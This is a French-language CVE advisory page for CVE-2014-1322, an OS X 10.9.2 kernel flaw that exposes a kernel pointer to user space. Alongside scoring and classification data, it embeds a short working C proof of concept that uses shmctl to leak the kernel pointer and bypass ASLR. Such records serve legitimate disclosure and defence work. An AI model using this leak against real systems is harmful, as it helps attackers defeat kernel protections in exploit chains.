CVE-2014-1322 : Détail

CVE-2014-1322

A01-Broken Access Control
0.05%V3
Local
2014-04-23
08h00 +00:00
2014-04-22
23h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The kernel in Apple OS X through 10.9.2 places a kernel pointer into an XNU object data structure accessible from user space, which makes it easier for local users to bypass the ASLR protection mechanism by reading an unspecified attribute of the object.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.9 AV:L/AC:L/Au:N/C:C/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 39147

Date de publication : 2014-04-21 22h00 +00:00
Auteur : Ian Beer
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/67023/info Apple Mac OS X is prone to a local security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected. #include <stdio.h> #include <strings.h> #include <sys/shm.h> int main(int argc, char *argv[]) { int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W ); if (shm < 0) { printf("shmget: failed"); return 6; } struct shmid_ds lolz; int res = shmctl( shm, IPC_STAT, &lolz ); if (res < 0) { printf("shmctl: failed"); return 1; } printf( "%p\n", lolz.shm_internal ); }

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.9.2

Apple>>Mac_os_x >> Version 10.9

Apple>>Mac_os_x >> Version 10.9.1

Références